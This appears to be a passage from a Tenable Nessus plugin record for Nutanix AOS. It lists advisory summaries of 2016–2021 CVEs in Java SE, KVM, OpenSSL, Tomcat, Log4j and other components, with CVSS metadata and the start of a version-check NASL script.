Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N). (CVE-2021-35550)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35556)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35559)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Utility). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35561)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Keytool). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts).\n CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N). (CVE-2021-35564)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35565)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Libraries). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows low privileged attacker with network access via Kerberos to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products.\n Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 6.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N). (CVE-2021-35567)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35578)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n ImageIO). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35586)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Hotspot). Supported versions that are affected are Java SE: 7u311, 8u301; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.1 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L). (CVE-2021-35588)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). (CVE-2021-35603)\n\n - A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). Due to improper validation of the int_ctl field, this issue could allow a malicious L1 to enable AVIC support (Advanced Virtual Interrupt Controller) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak of sensitive data or potential guest-to-host escape. This flaw affects Linux kernel versions prior to 5.14-rc7. (CVE-2021-3653)\n\n - A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). Due to improper validation of the virt_ext field, this issue could allow a malicious L1 to disable both VMLOAD/VMSAVE intercepts and VLS (Virtual VMLOAD/VMSAVE) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak of sensitive data or potential guest-to-host escape. (CVE-2021-3656)\n\n - arch/powerpc/kvm/book3s_rtas.c in the Linux kernel through 5.13.5 on the powerpc platform allows KVM guest OS users to cause host OS memory corruption via rtas_args.nargs, aka CID-f62f3c20647e. (CVE-2021-37576)\n\n - The Key Distribution Center (KDC) in MIT Kerberos 5 (aka krb5) before 1.18.5 and 1.19.x before 1.19.3 has a NULL pointer dereference in kdc/do_tgs_req.c via a FAST inner body that lacks a server field.\n (CVE-2021-37750)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - sshd in OpenSSH 6.2 through 8.x before 8.8, when certain non-default configurations are used, allows privilege escalation because supplemental groups are not initialized as expected. Helper programs for AuthorizedKeysCommand and AuthorizedPrincipalsCommand may run with privileges associated with group memberships of the sshd process, if the configuration specifies running the command as a different user.\n (CVE-2021-41617)\n\n - The fix for bug 63362 present in Apache Tomcat 10.1.0-M1 to 10.1.0-M5, 10.0.0-M1 to 10.0.11, 9.0.40 to 9.0.53 and 8.5.60 to 8.5.71 introduced a memory leak. The object introduced to collect metrics for HTTP upgrade connections was not released for WebSocket connections once the connection was closed. This created a memory leak that, over time, could lead to a denial of service via an OutOfMemoryError.\n (CVE-2021-42340)\n\n - ** DISPUTED ** An issue was discovered in the Bidirectional Algorithm in the Unicode Specification through 14.0. It permits the visual reordering of characters via control sequences, which can be used to craft source code that renders different logic than the logical ordering of tokens ingested by compilers and interpreters. Adversaries can leverage this to encode source code for compilers accepting Unicode such that targeted vulnerabilities are introduced invisibly to human reviewers. NOTE: the Unicode Consortium offers the following alternative approach to presenting this concern. An issue is noted in the nature of international text that can affect applications that implement support for The Unicode Standard and the Unicode Bidirectional Algorithm (all versions). Due to text display behavior when text includes left-to- right and right-to-left characters, the visual order of tokens may be different from their logical order.\n Additionally, control characters needed to fully support the requirements of bidirectional text can further obfuscate the logical order of tokens. Unless mitigated, an adversary could craft source code such that the ordering of tokens perceived by human reviewers does not match what will be processed by a compiler/interpreter/etc. The Unicode Consortium has documented this class of vulnerability in its document, Unicode Technical Report #36, Unicode Security Considerations. The Unicode Consortium also provides guidance on mitigations for this class of issues in Unicode Technical Standard #39, Unicode Security Mechanisms, and in Unicode Standard Annex #31, Unicode Identifier and Pattern Syntax. Also, the BIDI specification allows applications to tailor the implementation in ways that can mitigate misleading visual reordering in program text; see HL4 in Unicode Standard Annex #9, Unicode Bidirectional Algorithm.\n (CVE-2021-42574)\n\n - NSS (Network Security Services) versions prior to 3.73 or 3.68.1 ESR are vulnerable to a heap overflow when handling DER-encoded DSA or RSA-PSS signatures. Applications using NSS for handling signatures encoded within CMS, S/MIME, PKCS \\#7, or PKCS \\#12 are likely to be impacted. Applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how they configure NSS. *Note: This vulnerability does NOT impact Mozilla Firefox.* However, email clients and PDF viewers that use NSS for signature verification, such as Thunderbird, LibreOffice, Evolution and Evince are believed to be impacted. This vulnerability affects NSS < 3.73 and NSS < 3.68.1.\n (CVE-2021-43527)\n\n - It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non- default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n (CVE-2021-45046)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-01T00:00:00", "type": "nessus", "title": "Nutanix AOS : Multiple Vulnerabilities (NXSA-AOS-6.0.2.5)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4658", "CVE-2020-11651", "CVE-2020-11652", "CVE-2020-36385", "CVE-2021-20271", "CVE-2021-22543", "CVE-2021-23840", "CVE-2021-23841", "CVE-2021-30640", "CVE-2021-35550", "CVE-2021-35556", "CVE-2021-35559", "CVE-2021-35561", "CVE-2021-35564", "CVE-2021-35565", "CVE-2021-35567", "CVE-2021-35578", "CVE-2021-35586", "CVE-2021-35588", "CVE-2021-35603", "CVE-2021-3653", "CVE-2021-3656", "CVE-2021-37576", "CVE-2021-37750", "CVE-2021-40438", "CVE-2021-41617", "CVE-2021-42340", "CVE-2021-42574", "CVE-2021-43527", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:nutanix:aos"], "id": "NUTANIX_NXSA-AOS-6_0_2_5.NASL", "href": "https://www.tenable.com/plugins/nessus/164564", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164564);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2016-4658\",\n \"CVE-2020-11651\",\n \"CVE-2020-11652\",\n \"CVE-2020-36385\",\n \"CVE-2021-3653\",\n \"CVE-2021-3656\",\n \"CVE-2021-20271\",\n \"CVE-2021-22543\",\n \"CVE-2021-23840\",\n \"CVE-2021-23841\",\n \"CVE-2021-30640\",\n \"CVE-2021-35550\",\n \"CVE-2021-35556\",\n \"CVE-2021-35559\",\n \"CVE-2021-35561\",\n \"CVE-2021-35564\",\n \"CVE-2021-35565\",\n \"CVE-2021-35567\",\n \"CVE-2021-35578\",\n \"CVE-2021-35586\",\n \"CVE-2021-35588\",\n \"CVE-2021-35603\",\n \"CVE-2021-37576\",\n \"CVE-2021-37750\",\n \"CVE-2021-40438\",\n \"CVE-2021-41617\",\n \"CVE-2021-42340\",\n \"CVE-2021-42574\",\n \"CVE-2021-43527\",\n \"CVE-2021-45046\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/15\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"Nutanix AOS : Multiple Vulnerabilities (NXSA-AOS-6.0.2.5)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Nutanix AOS host is affected by multiple vulnerabilities .\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of AOS installed on the remote host is prior to 6.0.2.5. It is, therefore, affected by multiple\nvulnerabilities as referenced in the NXSA-AOS-6.0.2.5 advisory.\n\n - xpointer.c in libxml2 before 2.9.5 (as used in Apple iOS before 10, OS X before 10.12, tvOS before 10, and\n watchOS before 3, and other products) does not forbid namespace nodes in XPointer ranges, which allows\n remote attackers to execute arbitrary code or cause a denial of service (use-after-free and memory\n corruption) via a crafted XML document. (CVE-2016-4658)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process\n ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods\n without authentication. These methods can be used to retrieve user tokens from the salt master and/or run\n arbitrary commands on salt minions. (CVE-2020-11651)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process\n ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow\n arbitrary directory access to authenticated users. (CVE-2020-11652)\n\n - An issue was discovered in the Linux kernel before 5.10. drivers/infiniband/core/ucma.c has a use-after-\n free because the ctx is reached via the ctx_list in some ucma_migrate_id situations where ucma_close is\n called, aka CID-f5449e74802c. (CVE-2020-36385)\n\n - A flaw was found in RPM's signature check functionality when reading a package file. This flaw allows an\n attacker who can convince a victim to install a seemingly verifiable package, whose signature header was\n modified, to cause RPM database corruption and execute code. The highest threat from this vulnerability is\n to data integrity, confidentiality, and system availability. (CVE-2021-20271)\n\n - An issue was discovered in Linux: KVM through Improper handling of VM_IO|VM_PFNMAP vmas in KVM can bypass\n RO checks and can lead to pages being freed while still accessible by the VMM and guest. This allows users\n with the ability to start and control a VM to read/write random pages of memory and can result in local\n privilege escalation. (CVE-2021-22543)\n\n - Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument\n in some cases where the input length is close to the maximum permissable length for an integer on the\n platform. In such cases the return value from the function call will be 1 (indicating success), but the\n output length value will be negative. This could cause applications to behave incorrectly or crash.\n OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to\n OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out\n of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should\n upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i).\n Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x). (CVE-2021-23840)\n\n - The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based\n on the issuer and serial number data contained within an X509 certificate. However it fails to correctly\n handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is\n maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a\n potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by\n OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on\n certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are\n affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x\n and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving\n public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should\n upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected\n 1.0.2-1.0.2x). (CVE-2021-23841)\n\n - A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of\n a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue\n affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65. (CVE-2021-30640)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise\n Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with\n network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of\n this vulnerability can result in unauthorized access to critical data or complete access to all Java SE,\n Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for\n security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through\n a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS\n Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N). (CVE-2021-35550)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that\n load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3\n (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35556)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35559)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Utility). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35561)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Keytool). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to\n some of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts).\n CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N). (CVE-2021-35564)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise\n Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network\n access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of\n Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying\n data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted\n Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35565)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Libraries). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows low privileged attacker\n with network access via Kerberos to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful\n attacks require human interaction from a person other than the attacker and while the vulnerability is in\n Java SE, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products.\n Successful attacks of this vulnerability can result in unauthorized access to critical data or complete\n access to all Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies\n to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 6.8 (Confidentiality\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N). (CVE-2021-35567)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM Enterprise\n Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network\n access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of\n Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying\n data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted\n Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35578)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n 